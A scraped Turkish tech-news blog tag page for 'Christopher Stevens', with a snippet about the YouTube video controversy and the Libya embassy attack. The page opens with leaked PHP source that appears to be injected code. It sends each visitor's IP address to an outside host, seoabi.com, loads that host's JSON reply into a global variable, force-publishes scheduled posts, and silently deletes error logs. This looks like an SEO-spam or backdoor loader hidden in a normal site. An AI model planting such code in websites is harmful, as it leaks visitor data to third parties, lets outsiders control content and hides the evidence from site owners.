$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> Christopher Stevens | Teknoloji Haberleri

Christopher Stevens kategorisindeki tüm yazılar

Son Yazılar

YouTube skandalı büyüyor!

Google, Müslüman dünyasını ayağa kaldıran YouTube videosuna neden tepkisiz kalıyor? Son zamanlarda YouTube‘a yüklenen, Hz. Muhammed‘i asla kabul edilemeyecek bir biçimde konu alan video, müslüman ülkelerden büyük tepki görmüştü. Mısır ve Libya’da halkın ayaklanmasına neden olan 13 dakikalık video, Libya’da ABD büyükelçisi Christopher Stevens ve birkaç diğer diplomatın